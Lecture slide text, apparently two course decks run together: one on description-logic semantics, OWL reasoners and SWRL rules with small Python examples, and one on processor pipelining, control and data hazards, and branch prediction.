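print(interpret(artist, delta, C, R))  # {'rembrandt'}
```

This evaluates the Artist example from the syntax slide: Person ⊓ ∃created.Artwork denotes exactly {rembrandt} in this interpretation.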
# Modular Definition of Description Logics
<table>
<thead>
<tr>
<th>Constructor</th>
<th>Syntax</th>
<th>Semantics</th>
</tr>
</thead>
<tbody>
<tr>
<td>concept name</td>
<td>$C$</td>
<td>$C^I$</td>
</tr>
<tr>
<td>conjunction</td>
<td>$C_1 \sqcap C_2$</td>
<td>$C_1^I \cap C_2^I$</td>
</tr>
<tr>
<td>univ. quant.</td>
<td>$\forall R.C$</td>
<td>${d_1 \mid \forall d_2 \in \Delta^I. (R^I d_1 d_2 \rightarrow d_2 \in C^I)}$</td>
</tr>
<tr>
<td>top</td>
<td>$\top$</td>
<td>$\Delta^I$</td>
</tr>
<tr>
<td>negation ($C$)</td>
<td>$\neg C$</td>
<td>$\Delta^I \setminus C^I$</td>
</tr>
<tr>
<td>disjunction ($U$)</td>
<td>$C_1 \sqcup C_2$</td>
<td>$C_1^I \cup C_2^I$</td>
</tr>
<tr>
<td>exist. quant. ($\exists$)</td>
<td>$\exists R.C$</td>
<td>${d_1 \mid \exists d_2 \in \Delta^I. (R^I d_1 d_2 \land d_2 \in C^I)}$</td>
</tr>
<tr>
<td>number restr. ($N$)</td>
<td>$\geq nR$</td>
<td>$\{d_1 \mid \#\{d_2 \mid R^I d_1 d_2\} \geq n\}$</td>
</tr>
<tr>
<td></td>
<td>$\leq nR$</td>
<td>$\{d_1 \mid \#\{d_2 \mid R^I d_1 d_2\} \leq n\}$</td>
</tr>
<tr>
<td>one-of ($O$)</td>
<td>$\{a_1, \ldots, a_n\}$</td>
<td>$\{d \mid d = a_i^I \text{ for some } a_i\}$</td>
</tr>
<tr>
<td>filler ($B$)</td>
<td>$\exists R.\{a\}$</td>
<td>$\{d \mid R^I d\, a^I\}$</td>
</tr>
<tr>
<td>role name</td>
<td>$R$</td>
<td>$R^I$</td>
</tr>
<tr>
<td>role conj. ($R$)</td>
<td>$R_1 \sqcap R_2$</td>
<td>$R_1^I \cap R_2^I$</td>
</tr>
<tr>
<td>inverse roles ($T$)</td>
<td>$R^{-1}$</td>
<td>$\{(d_1, d_2) \mid R^I(d_2, d_1)\}$</td>
</tr>
</tbody>
</table>
Reasoning
- With the definition of the semantics, we may now define some reasoning methods
- Reasoning on the structure of the ontology
- Reasoning on relationships among classes
- Reasoning on instances
Concept Reasoning
Based on these semantics there are two basic reasoning services:
- **Concept satisfiability**, $\models C \neq \bot$.
- Check whether for some interpretation $\mathcal{I}$ we have $C^\mathcal{I} \neq \emptyset$.
- $\models \forall \text{creates.Sculpture} \sqcap \exists \text{creates.}(\text{Artwork} \sqcap \neg \text{Sculpture}) = \bot$.
- **Concept subsumption**, $\models C_1 \sqsubseteq C_2$.
- Check whether for all interpretations $\mathcal{I}$ we have $C_1^\mathcal{I} \subseteq C_2^\mathcal{I}$.
- $\models \forall \text{creates.Painting} \sqcap \exists \text{creates.}\top \sqsubseteq \exists \text{creates.Painting}$.
Terminological Reasoning
\[ \mathcal{T} = \{ \text{Painting} \sqsubseteq \text{Artwork} \sqcap \neg \text{Sculpture}, \]
\[ \text{Painter} \sqsubseteq \exists \text{creates}.\text{Painting}, \]
\[ \text{Sculpturer} \sqsubseteq \exists \text{creates}.\text{Artwork} \sqcap \forall \text{creates}.\text{Sculpture} \} \]
- **Concept satisfiability**, \( \Sigma \models C \neq \bot \).
- Check whether there is an interpretation \( \mathcal{I} \) such that \( \mathcal{I} \models \Sigma \)
and \( C^\mathcal{I} \neq \emptyset \).
- **Unsatisfiability**: \( \Sigma \models \text{Painter} \sqcap \text{Sculpturer} = \bot \).
- **Subsumption**, \( \Sigma \models C_1 \sqsubseteq C_2 \).
- Check whether for all interpretations \( \mathcal{I} \) such that \( \mathcal{I} \models \Sigma \) we have \( C^\mathcal{I}_1 \subseteq C^\mathcal{I}_2 \).
- **Subsumption**: \( \Sigma \models \text{Painter} \sqsubseteq \neg \text{Sculpturer} \)
Assertional reasoning
\[ \mathcal{A} = \{ \text{rembrandt:Artist}, \text{nightwatch:Painting}, (\text{rembrandt,nightwatch}):\text{created} \} \]
\[ \text{and } \Sigma = \langle \mathcal{T}, \mathcal{A} \rangle \]
- **Consistency**, \( \Sigma \not\models \bot \).
- Check whether there exists \( \mathcal{I} \) such that \( \mathcal{I} \models \Sigma \).
- \( \langle \mathcal{T}, \mathcal{A} \rangle \) is consistent, but \( \langle \mathcal{T}, \mathcal{A} \cup \{ \text{rembrandt:Sculpturer} \} \rangle \) is not.
- **Instance Checking**, \( \Sigma \models a : C \).
- Check whether \( a^\mathcal{I} \in C^\mathcal{I} \) for all interpretations \( \mathcal{I} \models \Sigma \).
- Example: \( \Sigma \models \text{rembrandt} : \text{Painter} \).
- **Derived reasoning tasks**:
- **Retrieval**: \( \text{retrieve}(\text{Artist}) = \{ \text{rembrandt} \} \).
- **Realization**: find the most specific concepts in \( \mathcal{T} \) for the instances in \( \mathcal{A} \).
- \( \text{realize}(\text{rembrandt}) = \text{Painter} \)
What is an OWL-DL reasoner
- The official normative definition:
- An *OWL consistency checker* takes a document as input, and returns one word being Consistent, Inconsistent, or Unknown. [J. J. Carroll, J. D. Roo, OWL Web Ontology Language Test Cases, W3C Recommendation http://www.w3.org/TR/owl-test/ (2004).]
- Rather restrictive... and not very useful for ontology development, debug and querying
## DL Jargon
<table>
<thead>
<tr>
<th>Abbr.</th>
<th>Stands for</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>ABox</td>
<td>Assertional Box</td>
<td>Component that contains assertions about individuals, i.e. OWL facts such as type, property-value, equality or inequality assertions.</td>
</tr>
<tr>
<td>TBox</td>
<td>Terminological Box</td>
<td>Component that contains axioms about classes, i.e. OWL axioms such as subclass, equivalent class or disjointness axioms.</td>
</tr>
<tr>
<td>KB</td>
<td>Knowledge Base</td>
<td>A combination of an ABox and a TBox, i.e. a complete OWL ontology.</td>
</tr>
</tbody>
</table>
Classical Types of Logic Inference
- **Consistency checking**, which ensures that an ontology does not contain any contradictory facts.
- The OWL Abstract Syntax & Semantics document [S&AS] provides a formal definition of ontology consistency that Pellet uses.
- In DL terminology, this is the operation to check the consistency of an ABox with respect to a TBox.
- Equivalent to OWL Consistency Checking
Classical Types of Logic Inference
- **Concept satisfiability**, which checks if it is possible for a class to have any instances. If class is unsatisfiable, then defining an instance of the class will cause the whole ontology to be inconsistent.
Classical Types of Logic Inference
- **Classification**, which computes the subclass relations between every named class to create the complete class hierarchy. The class hierarchy can be used to answer queries such as getting all or only the direct subclasses of a class.
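A sketch of the last step of classification: once the full (transitively closed) subclass relation has been computed, the *direct* subclasses of a class are those with no other subclass strictly between. Names below are illustrative:

```python
# Extract direct subclasses from an entailed, transitively closed
# set of (sub, super) subsumption pairs.

def direct_subclasses(subsumptions, cls):
    subs = {a for a, b in subsumptions if b == cls and a != cls}
    # a is direct if no other subclass of cls sits strictly between a and cls
    return {a for a in subs
            if not any((a, m) in subsumptions for m in subs - {a})}

entailed = {("Painter", "Artist"), ("Sculptor", "Artist"),
            ("PortraitPainter", "Painter"), ("PortraitPainter", "Artist")}
print(sorted(direct_subclasses(entailed, "Artist")))  # ['Painter', 'Sculptor']
```

PortraitPainter is a subclass of Artist but not a direct one, because Painter lies between them — the distinction the class-hierarchy queries above rely on.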
- **Realization**, which finds the most specific classes that an individual belongs to; or in other words, computes the direct types for each of the individuals. Realization can only be performed after classification, since direct types are defined with respect to the class hierarchy.
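As a toy illustration (not how a real DL reasoner works internally — systems like Pellet use tableau algorithms), classification can be pictured as computing the transitive closure of the asserted subclass axioms and then extracting the direct subclass links. The class names below are invented for the example:

```python
# Toy "classification": from asserted subclass axioms, compute all implied
# subclass relations (transitive closure) and the direct subclasses
# (pairs with no intermediate class strictly between them).
def classify(axioms):
    """axioms: set of (sub, sup) pairs. Returns (closure, direct)."""
    closure = set(axioms)
    changed = True
    while changed:  # naive transitive closure
        changed = False
        for (a, b) in list(closure):
            for (c, d) in list(closure):
                if b == c and (a, d) not in closure:
                    closure.add((a, d))
                    changed = True
    names = {x for pair in closure for x in pair}
    direct = {(a, b) for (a, b) in closure
              if not any((a, m) in closure and (m, b) in closure
                         for m in names if m not in (a, b))}
    return closure, direct

axioms = {("Student", "Person"), ("Person", "Agent")}
closure, direct = classify(axioms)
print(("Student", "Agent") in closure)  # True: implied by transitivity
print(("Student", "Agent") in direct)   # False: Person sits in between
```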
Some OWL reasoners
- **Fact++**
- **Hermit**
- **Kaon2**
- **Pellet 2.0**
- **RacerPro**
- **Vampire**
Outline
- Automated Reasoning
- OWL Semantics and Profiles
- Reasoning with Description Logics
- SWRL
Semantic Web Rule Language (SWRL)
- Not an official W3C Recommendation
- Application to OWL of the RuleML (http://ruleml.org/) languages
- Extends OWL language by providing Horn clauses
- Defines an extension of the OWL model-theoretic semantics
SWRL structure
• The rules are of the form of an implication between an antecedent (body) and consequent (head).
• The intended meaning can be read as:
– whenever the conditions specified in the antecedent hold,
– then the conditions specified in the consequent must also hold.
General structure
• Both the antecedent (body) and consequent (head) consist of zero or more atoms.
– An **empty antecedent** is treated as trivially **true** (i.e. satisfied by every interpretation), so the consequent must also be satisfied by every interpretation;
– an **empty consequent** is treated as trivially **false** (i.e., not satisfied by any interpretation), so the antecedent must also not be satisfied by any interpretation.
• Multiple atoms are treated as a **conjunction**
Rule structure
• A SWRL rule contains an antecedent part, which is referred to as the *body*, and a consequent part, which is referred to as the *head*.
• Both the body and head consist of positive conjunctions of *atoms*:
\[- \text{atom} \land \text{atom} \ldots \rightarrow \text{atom} \land \text{atom}\]
• SWRL does not support negated atoms or disjunction.
Atoms
- Atoms in these rules can be of the form
- $C(x)$, where $C$ is an OWL description (class)
- $P(x,y)$, where $P$ is an OWL property
- `sameAs(x,y)`
- `differentFrom(x,y)`
- where $x, y$ are either variables, OWL individuals or OWL data values
Atoms
• \( p(\text{arg1}, \text{arg2}, \ldots \text{Argn}) \)
• \( p \) is a predicate symbol
– OWL classes, properties or data types
• \( \text{arg1}, \text{arg2}, \ldots, \text{argn} \) are the terms or arguments of the expression
– OWL individuals or data values,
– variables referring to them
• All variables in SWRL are treated as universally quantified
Atom types
• Class Atoms
– Person(?p)
– Man(Fred)
• Individual Property atoms
– hasBrother(?x, ?y)
– hasSibling(Fred, ?y)
• Data Valued Property atoms
– hasAge(?x, ?age)
– hasHeight(Fred, ?h)
– hasAge(?x, 232)
– hasName(?x, "Fred")
• Different Individuals atoms
– differentFrom(?x, ?y)
– differentFrom(Fred, Joe)
• Same Individual atoms
– sameAs(?x, ?y)
– sameAs(Fred, Freddy)
• Built-in atoms
– Runtime-provided functions
– Core built-ins in swrlb:
• Data Range atoms
Syntax issues
• SWRL rules are defined according to different syntax forms
– Abstract syntax (in functional form)
– XML concrete syntax
– RDF concrete syntax
– Human-readable form (using logic predicates)
Example: uncle
- **Human-readable syntax**
- `hasParent(?x1,?x2) ∧ hasBrother(?x2,?x3) --> hasUncle(?x1,?x3)`
- **Abstract syntax**
- `Implies(Antecedent(`
  `hasParent(I-variable(x1) I-variable(x2))`
  `hasBrother(I-variable(x2) I-variable(x3)))`
  `Consequent(`
  `hasUncle(I-variable(x1) I-variable(x3))))`
- **Example**: if John has Mary as a parent and Mary has Bill as a brother then John has Bill as an uncle
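The uncle rule can be mimicked by naive forward chaining over a small fact base; the sketch below uses plain Python sets, with the individuals taken from the example above:

```python
# Facts from the example: hasParent(John, Mary), hasBrother(Mary, Bill)
has_parent = {("John", "Mary")}
has_brother = {("Mary", "Bill")}

# Rule: hasParent(?x1,?x2) ∧ hasBrother(?x2,?x3) -> hasUncle(?x1,?x3)
# Join the two relations on the shared variable ?x2.
has_uncle = {(x1, x3)
             for (x1, x2) in has_parent
             for (x2b, x3) in has_brother
             if x2 == x2b}
print(has_uncle)  # {('John', 'Bill')}
```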
Example: inheritance
• Human-readable syntax
– Student(?x1) -> Person(?x1)
• Abstract syntax
– Implies(Antecedent(Student(I-variable(x1)))
Consequent(Person(I-variable(x1))))
• This is an improper usage of rules: it should be expressed directly in OWL, to make the information also available to an OWL reasoner
– SubClassOf(Student Person)
Example: propagating properties
• **Human-readable syntax**
- Artist(?x) ∧ artistStyle(?x,?y) ∧ Style(?y) ∧ creator(?z,?x) -> style/period(?z,?y)
• **Abstract syntax**
- Implies(Antecedent(
Artist(I-variable(x))
artistStyle(I-variable(x) I-variable(y))
Style(I-variable(y))
creator(I-variable(z) I-variable(x)))
Consequent(style/period(I-variable(z) I-variable(y))))
• **Meaning:** the style of an art object is the same as the style of the creator
SWRL versus OWL
- The last example cannot be expressed in OWL
- In OWL, you declare relationships between Classes
- Such relationships are intended to apply on instances
- You may add properties to instances to materialize such relationships
- OWL Inference only supports “for all” or “exists” in propagating properties
- In OWL you may not express “that specific instance that has such properties”!
OWL versus SWRL
• OWL has a declarative nature, while SWRL is more operational
– Even if the semantics extends that of OWL, practical reasoners just “apply the rules”
• The consistency of the rules application relies on the rule designer’s infinite wisdom
• Example: If a property is declared as symmetric, then we must be careful to create all property instances to satisfy that
SWRL in Protege
- Enable "SWRL Tab"
- Uses the "Drools" rule engine
- 3-step process:
- OWL + Rules transferred to Drools
- Running Drools
- Inferred statements transferred back to OWL (optional)
References
• Course material for “Practical Reasoning for the Semantic Web” course at the 17th European Summer School in Logic, Language and Information (ESSLLI)
References
• OWL Web Ontology Language: Semantics and Abstract Syntax – W3C Recommendation 10 February 2004 [S&AS]
– http://www.w3.org/TR/owl-semantics/
• OWL 2 Web Ontology Language Profiles (Second Edition)
– https://www.w3.org/TR/owl2-profiles/
• OWL 2 Web Ontology Language Primer (Second Edition)
– https://www.w3.org/TR/owl2-primer/
References (SWRL)
• SWRL API in Protégé
– https://github.com/protegeproject/swrlapi/wiki
• SWRL Language FAQ
– https://github.com/protegeproject/swrlapi/wiki/SWRLLanguageFAQ
License
• This work is licensed under the Creative Commons “Attribution-NonCommercial-ShareAlike Unported (CC BY-NC-SA 3.0)” License.
• You are free:
– to Share - to copy, distribute and transmit the work
– to Remix - to adapt the work
• Under the following conditions:
– Attribution - You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of the work).
– Noncommercial - You may not use this work for commercial purposes.
– Share Alike - If you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.
• To view a copy of this license, visit http://creativecommons.org/license/by-nc-sa/3.0/
Pipelining
Reducing Instruction Execution Time
Dr. Javier Navaridas
javier.navaridas@manchester.ac.uk
Overview and Learning Outcomes
• Deepen the understanding on how modern processors work
• Learn how pipelining can improve processors performance and efficiency
• Being aware of the problems arising from using pipelined processors
• Understanding instruction dependencies
The Fetch-Execute Cycle
- As explained in COMP15111, instruction execution is a simple repetitive cycle:
```
LDR R0, x
LDR R1, y
ADD R2, R1, R0
STR R2, Z
...
```
Fetch Instruction
Execute Instruction
Fetch-Execute Detail
The two parts of the cycle can be further subdivided
• Fetch
– Get instruction from memory (IF)
– Decode instruction & select registers (ID)
• Execute
– *Perform operation or calculate address (EX)*
– *Access an operand in data memory (MEM)*
– *Write result to a register (WB)*
We have designed the ‘worst case’ data path
– It works for all instructions
### Processor Detail
#### IF
- Instruction Fetch
#### ID
- Instruction Decode
#### EX
- Execute Instruction
#### MEM
- Access Memory
#### WB
- Write Back
**Cycle i**
<table>
<thead>
<tr><th>Instruction</th><th>ID Action</th><th>EX Action</th><th>MEM Action</th><th>WB Action</th></tr>
</thead>
<tbody>
<tr><td>LDR R0, x</td><td>Select register (PC)</td><td>Compute address x</td><td>Get value from [x]</td><td>Write in R0</td></tr>
</tbody>
</table>
**Cycle i+1**
<table>
<thead>
<tr><th>Instruction</th><th>ID Action</th><th>EX Action</th><th>MEM Action</th><th>WB Action</th></tr>
</thead>
<tbody>
<tr><td>ADD R2,R1,R0</td><td>Select registers (R0, R1)</td><td>Add R0 & R1</td><td>Do nothing</td><td>Write in R2</td></tr>
</tbody>
</table>
Cycles of Operation
• Most logic circuits are driven by a clock
• In its simplest form one instruction would take one clock cycle (single-cycle processor)
• This is assuming that getting the instruction and accessing data memory can each be done in 1/5 of a cycle (i.e. a cache hit)
• For this part we will assume a perfect cache replacement strategy
Logic to do this
- Each stage will do its work and pass to the next
- Each block is only doing useful work once every $\frac{1}{5}$th of a cycle
### Application Execution
<table>
<thead>
<tr>
<th>Clock Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LDR</strong></td>
<td>IF ID EX MEM WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>LDR</strong></td>
<td></td>
<td>IF ID EX MEM WB</td>
<td></td>
</tr>
<tr>
<td><strong>ADD</strong></td>
<td></td>
<td></td>
<td>IF ID EX MEM WB</td>
</tr>
</tbody>
</table>
- Can we do it any better?
- Increase utilization
- Accelerate execution
Insert Buffers Between Stages
- Instead of direct connection between stages – use extra buffers to hold state
- Clock buffers once per cycle
In a pipeline processor
• Just like a car production line
• We still can execute one instruction every cycle
• But now clock frequency is increased by 5x
• 5x faster execution!
Clock Cycle
<table>
<thead>
<tr>
<th></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
</tr>
</thead>
<tbody>
<tr>
<td>LDR</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>LDR</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>ADD</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Benefits of Pipelining
Without Pipelining
<table>
<thead>
<tr><th></th><th>Cycle 1</th><th>Cycle 2</th><th>Cycle 3</th></tr>
</thead>
<tbody>
<tr><td>LDR</td><td>IF ID EX MEM WB</td><td></td><td></td></tr>
<tr><td>LDR</td><td></td><td>IF ID EX MEM WB</td><td></td></tr>
<tr><td>ADD</td><td></td><td></td><td>IF ID EX MEM WB</td></tr>
</tbody>
</table>
With Pipelining
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th></tr>
</thead>
<tbody>
<tr><td>LDR</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
<tr><td>LDR</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td></tr>
<tr><td>ADD</td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
Why 5 Stages?
• Simply because designers of early pipelined processors found that dividing execution into these 5 stages of roughly equal complexity was appropriate
• Some recent processors have used more than 30 pipeline stages
• We will consider 5 for simplicity at the moment
Imagine we have a non-pipelined processor running at 10MHz and want to run a program with 1000 instructions.
a) How much time would it take to execute the program?
Pipelining Example
Assuming ideal conditions (perfect pipelining and no hazards), how much time would it take to execute the same program in:
b) A 10-stage pipeline?
c) A 100-stage pipeline?
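The idealised timing model behind these questions can be sketched as follows, assuming an n-stage pipeline multiplies the clock frequency by n and, once full, completes one instruction per cycle:

```python
def exec_time(n_instr, base_freq_hz, stages=1):
    """Idealised model: a pipeline with `stages` stages runs at
    stages * base_freq_hz and needs (stages - 1) fill cycles before
    it completes one instruction per cycle."""
    freq = stages * base_freq_hz
    cycles = (stages - 1) + n_instr
    return cycles / freq

t_plain = exec_time(1000, 10e6)              # non-pipelined: 100 us
t_10    = exec_time(1000, 10e6, stages=10)   # 1009 cycles at 100 MHz
t_100   = exec_time(1000, 10e6, stages=100)  # 1099 cycles at 1 GHz
print(t_plain, t_10, t_100)
```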
Pipelining Example
Looking at those results, it seems clear that increasing pipeline depth should increase the execution speed of a processor. Why do you think that processor designers (see Intel, below) have not only stopped increasing pipeline length but, in fact, reduced it?
- **Pentium III – Coppermine (1999)** – 10-stage pipeline
- **Pentium Prescott (2004)** – 31-stage pipeline
- **Core i7 9xx – Bloomfield (2008)** – 24-stage pipeline
- **Core i7 5Yxx – Broadwell (2014)** – 19-stage pipeline
Limits to Pipeline Scalability
• Higher freq. => more power consumed
• More stages
– more extra hardware
– more complex design (forwarding?)
– more difficult to split into uniform size chunks
– loading time of the registers limits cycle period
• Hazards (control and data)
– A longer datapath means higher probability of hazards occurring and worse penalties when they happen
Control Hazards
The Control Transfer Problem
• Instructions are normally fetched sequentially (i.e. just incrementing the PC)
• What if we fetch a branch?
– We only know it is a branch when we decode it in the second stage of the pipeline
– By that time we are already fetching the next instruction in serial order
A Pipeline ‘Bubble’
We must mark Inst 5 as unwanted and ignore it as it goes down the pipeline. But we have wasted a cycle.
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th></tr>
</thead>
<tbody>
<tr><td>Inst 3</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>B n</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
<tr><td>Inst 5</td><td></td><td></td><td>IF</td><td>(bubble)</td><td></td><td></td><td></td><td></td></tr>
<tr><td>...</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>Inst n</td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
We know it is a branch here. Inst 5 is already fetched.
Conditional Branches
- It gets worse!
- Suppose we have a conditional branch
- It is possible that we might not be able to determine the branch outcome until the execute (3rd) stage
- We would then have 2 ‘bubbles’
- We can often avoid this by reading registers during the decode stage.
Conditional Branches
We do not know whether we have to branch until EX. Inst 5 & 6 are already fetched
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th><th>9</th></tr>
</thead>
<tbody>
<tr><td>Inst 3</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td><td></td></tr>
<tr><td>BEQ n</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>Inst 5</td><td></td><td></td><td>IF</td><td>(bubble)</td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>Inst 6</td><td></td><td></td><td></td><td>IF</td><td>(bubble)</td><td></td><td></td><td></td><td></td></tr>
<tr><td>..</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>Inst n</td><td></td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
If condition is true, we must mark Inst 5 & 6 as unwanted and ignore them as they go down the pipeline. 2 wasted cycles now
Deeper Pipelines
• ‘Bubbles’ due to branches are called **Control Hazards**
• They occur when it takes one or more pipeline stages to detect the branch
• The more stages, the less each does
• More likely to take multiple stages
• Longer pipelines usually suffer more degradation from control hazards
Branch Prediction
• In most programs many branch instructions are executed many times
– E.g. loops, functions
• What if, when a branch is executed
– We **take note** of its address
– We **take note** of the target address
– We use this info the next time the branch is fetched
Branch Target Buffer
• We could do this with some sort of (small) cache
<table>
<thead>
<tr>
<th>Address</th>
<th>Data</th>
</tr>
</thead>
<tbody>
<tr>
<td>Branch Address</td>
<td>Target Address</td>
</tr>
</tbody>
</table>
• As we fetch the branch we check the BTB
• If a valid entry in BTB, we use its target to fetch next instruction (rather than the PC)
Branch Target Buffer
- For unconditional branches we always get it right
- For conditional branches it depends on the probability of repeating the target
- E.g. a ‘for’ loop which jumps back many times we will get it right most of the time (only first and last time will mispredict)
- But it is only a prediction, if we get it wrong we pay a penalty (bubbles)
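A BTB of this kind can be sketched as a small direct-mapped table; the size and indexing scheme below are illustrative, not those of any particular processor:

```python
# Minimal branch-target-buffer sketch: a small direct-mapped cache
# mapping a branch's address to the last target it jumped to.
class BTB:
    def __init__(self, entries=16):
        self.entries = entries
        self.table = {}          # index -> (branch_addr, target_addr)

    def predict(self, pc):
        """Return the predicted target on a valid hit, else None
        (the fetch unit then falls back to the sequential PC)."""
        hit = self.table.get(pc % self.entries)
        if hit and hit[0] == pc:
            return hit[1]
        return None

    def update(self, pc, target):
        """Record the actual target once the branch resolves."""
        self.table[pc % self.entries] = (pc, target)

btb = BTB()
print(btb.predict(0x100))   # None: first encounter, no prediction
btb.update(0x100, 0x040)    # branch at 0x100 jumped to 0x040
print(btb.predict(0x100))   # 0x040 predicted next time round the loop
```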
Outline Implementation
Other Branch Prediction
• BTB is simple to understand
– But expensive to implement
– And it just uses the last branch to predict
• In practice, prediction accuracy depends on
– More history (several previous branches)
– Context (how did we get to this branch)
• Real-world branch predictors are more complex and vital to performance for deep pipelines
Benefits of Branch Prediction
**Without Branch Prediction**
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th><th>9</th></tr>
</thead>
<tbody>
<tr><td>Inst a</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td><td></td></tr>
<tr><td>BEQ n</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>Inst c</td><td></td><td></td><td>IF</td><td>(bubble)</td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>Inst d</td><td></td><td></td><td></td><td>IF</td><td>(bubble)</td><td></td><td></td><td></td><td></td></tr>
<tr><td>..</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>Inst n</td><td></td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
The comparison is not done until 3rd stage, so 2 instructions have been issued and need to be eliminated from the pipeline and we have wasted 2 cycles.
**With Branch Prediction**
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th><th>9</th></tr>
</thead>
<tbody>
<tr><td>Inst a</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td><td></td></tr>
<tr><td>BEQ n</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>Inst c</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>Inst d</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>..</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>Inst n</td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
</tbody>
</table>
If we predict that next instruction will be ‘n’ then we pay no penalty.
Consider a simple program with two nested loops as the following:
```java
while (true) {
for (i=0; i<x; i++) {
do_stuff
}
}
```
With the following assumptions:
- `do_stuff` has 20 instructions that can be executed ideally in the pipeline.
- The overhead for control hazards is 3 cycles, regardless of whether the branch is unconditional or conditional.
- Each of the two loops can be translated into a single branch instruction.
Calculate the instructions-per-cycle that can be achieved for different values of `x` (2, 4, 10, 100):
a) Without branch prediction.
b) With a simple branch prediction policy - do the same as the last time.
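A sketch of the steady-state model for this exercise. The treatment of mispredictions is an assumption about the intended reading: under "same as last time" the inner branch mispredicts twice per outer iteration (on loop exit and on re-entry), while the always-taken outer branch is always predicted correctly.

```python
def ipc(x, predict=False):
    """Steady-state IPC per outer-loop iteration under the exercise's
    assumptions: 20 instructions in do_stuff, each loop compiles to one
    branch, and each mispredicted (or unpredicted) branch costs 3 cycles."""
    instrs = 21 * x + 1          # 20x body + x inner branches + 1 outer branch
    if predict:
        penalties = 3 * 2        # assumed: inner branch mispredicts twice
    else:
        penalties = 3 * (x + 1)  # every branch pays the full penalty
    return instrs / (instrs + penalties)

for x in (2, 4, 10, 100):
    print(x, round(ipc(x), 3), round(ipc(x, predict=True), 3))
```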
Control Hazard Example
Data Hazards
Data Hazards
• Pipeline can cause other problems
• Consider the following instructions:
ADD R1,R2,R3
MUL R0,R1,R1
• The ADD produces a value in R1
• The MUL uses R1 as input
• There is a data dependency between them
The new value of R1 has not been updated in the register bank
MUL would be reading an outdated value!!
The Data is not Ready
• At the end of the ID cycle, MUL instruction should have selected value in R1 to put into buffer at input to EX stage
• But the correct value for R1 from ADD instruction is being put into the buffer at the output of EX stage at this time
• It will not get to the input of WB until one cycle later – then probably another cycle to write into register bank
Dealing with data dependencies (I)
- Detect dependencies in HW and **hold instructions** in ID stage until data is ready, i.e. **pipeline stall**
- Bubbles and wasted cycles again
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th></tr>
</thead>
<tbody>
<tr><td>ADD R1,R2,R3</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>MUL R0,R1,R1</td><td></td><td>IF</td><td>stall</td><td>stall</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
- Data is produced at the end of ADD's EX stage (cycle 3)
- R1 is written back in ADD's WB stage (cycle 5)
- MUL cannot read R1 in its ID stage until then, so it stalls for 2 cycles
Dealing with data dependencies (II)
- Use the compiler to try and **reorder instructions**
- Only works if we can find something useful to do – otherwise insert NOPs – waste
<table>
<thead>
